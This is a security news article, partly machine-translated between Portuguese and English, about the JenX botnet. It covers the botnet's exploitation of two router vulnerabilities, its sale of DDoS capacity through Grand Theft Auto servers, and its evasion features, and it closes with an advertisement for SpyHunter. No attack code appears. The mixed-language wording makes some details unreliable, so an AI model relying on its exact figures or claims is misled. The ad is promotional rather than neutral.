Casa > cibernético Notícias > JenX Botnet Recruits Devices Via Grand Theft Auto Servers
CYBER NEWS

JenX Botnet Recrutas Devices Via Grand Theft Auto Servers

JenX botnet image

Computer security experts reported the discovery of a new malware threat called the JenX Botnet which uses highly unusual distribution tactics. Instead of relying on standard email messages it abuses one of the most popular video games — Grand Theft Auto as well as IoT devices.

Story relacionado: O botnet Droidclub infiltra máquinas por meio de extensões do Google Chrome

JenX Botnet Discovery and Infiltration Tactics

A new worldwide botnet infection has been reported by the security community. The new threat is called the JenX botnet and features a highly unusual infiltration mechanism. According to the code analysis takes advantage of several vulnerabilities that affect certain popular router models made by Huawei e Realtek. They are among the biggest network equipment manufacturers and such models are usually bought by Internet Service Providers (ISPs) and given out to customers. This means that potentially thousands or even millions of computers can fall victim to the automated penetration testing. The two vulnerabilities are tracked in the following security advisories:

  • CVE-2014-8361 — The miniigd SOAP service in Realtek SDK allows remote attackers to execute arbitrary code via a crafted NewInternalClient request.
  • CVE-2017-17215 — Huawei HG532 CVE-2017-17215 Remote Code Execution Vulnerability.

Its interesting to note that both weaknesses are taken from the Botnet Satori. The snippets were identified in public posts made by the hacker known under the aliasJanit0rwho is the author of BrickerBot. According to the research the botnet is designed specifically against gaming providers, clubs and gamers.

The malware code infiltrates servers that power up games and as a result infect the client machines as well. The link made with the Grand Theft Auto game is due to the fact that compromised servers hosting the JenX botnet host the game. Such tactics are particularly effective against targets as gaming servers are known for their performance and network connectivity.

This is a follow-up upgrade from base botnets like Mirai. Their intrusion strategy was to rely on default credentials which are probed for access. Once the malware has compromised the target device it can change the account credentials and deny access to the owners. The second-generation botnets like Satori depend on firmware vulnerabilities and as a result they are much more effective against potential targets. Most IoT devices never receive critical security updates either due to a lack of software support or owner negligence. Exploits can be easily triggered using automated platforms which makes it easy even for beginner users to utilize it in their attack schemes.

The JenX Botnet and the Gaming Servers Connection

One of the proposed reasons why the malware targets gaming servers is the fact that they are frequently rented for whole groups or used in tournaments. Once the malware code has infected the server itself it can be used to spread viruses to the connected clients through the video games themselves. Usually they integrate in themselves chat options which can be abused.

Using social engineering tactics the criminals can opt to deliver additional malware through links posted in the chat software. They can be disguised as service messages such as password reset links, notificações e etc..

In other cases the victims can be redirected to malware sites which include phishing elements. Instead of delivering executable files the criminals attempt to confuse the users into entering their account credentials to impostor sites. The criminals usually take the graphics and text elements from web services and social networks which are among the most widely visited sites. In recent years these type of scams have become so advanced that sometimes it is hard to tell the fake from the legitimate service. The criminals not only impose almost the same visual identity, but also sign the security certificates and establish a secure connection with credentials that bear a striking resemblance to the actual real ones.

Story relacionado: Smominru Botnet infecta máquinas com Monero criptomoeda Miner

JenX Botnet Infection Capabilities

The researchers note that the botnet is particularly dangerous as it integrates an advanced módulo de proteção furtiva that aims to hide the threat from security software and analysis. Such techniques are also bundled in advanced ransomware samples where the infection engine looks out for any sandbox or debugging environments, máquinas virtuais e produtos antivírus. They can be either disabled or removed. The viruses can also be instructed into deleting themselves if they are unable to bypass the security protection. Such steps can also be integrated in the JenX botnet via script commands. The hackers were found to distribute copies of the JenX compatible with MIPS, ARM and X86 which are the most popular platforms.

The hacker operators seek to silently infiltrate both commercial servers and private ones. Its interesting to note that that the wide audience support seems like an important factor to consider. The criminal community behind the attacks seem to utilize a centralized server which acts as the primary malware platform. The experts load the vulnerabilities along with other custom scripts to execute the follow-up stages of infections.

The infiltrated sites offer access to a Grand Theft Auto San Andreas modded servers for the price of $16, TeamSpeak servers are sold for $9. If the hackers pay $20 more they can utilize the compromised servers for controlled DDOS attacks against single targets. The reports indicate that the peak network thorough can be 290 ou 300 Gbps. At the moment the impact caused by the JenX botnet is related to a minor disruption among local gamers. It can be used to sabotage Grand Theft Auto tournaments and group play.

The experts note that if the centralized servers can be taken down the whole platform can fail. It is presumed that the threat can be updated in future versions to utilize a decentralized approach. Recent infections have been found to feature a P2P approach which is harder to mitigate.

We recommend that all users scan their systems for active infections and protect themselves from incoming threats by using a quality anti-spyware solution.

Baixar

Remoção de Malware Ferramenta


digitalizador Spy Hunter só irá detectar a ameaça. Se você quiser a ameaça de ser removido automaticamente, você precisa comprar a versão completa da ferramenta anti-malware.Saiba Mais Sobre SpyHunter Anti-Malware Ferramenta / Como desinstalar o SpyHunter

Avatar

Martin Beltov

Martin formou-se na publicação da Universidade de Sofia. Como a segurança cibernética entusiasta ele gosta de escrever sobre as ameaças mais recentes e mecanismos de invasão.

mais Posts

Me siga:
Twitter

Deixe um comentário

seu endereço de e-mail não será publicado. Campos obrigatórios são marcados *

Compartilhar no Facebook Compartilhar
Carregando...
Compartilhar no Twitter chilrear
Carregando...
Compartilhar no Google Plus Compartilhar
Carregando...
Partilhar no Linkedin Compartilhar
Carregando...
Compartilhar no Digg Compartilhar
Compartilhar no Reddit Compartilhar
Carregando...
Partilhar no StumbleUpon Compartilhar
Carregando...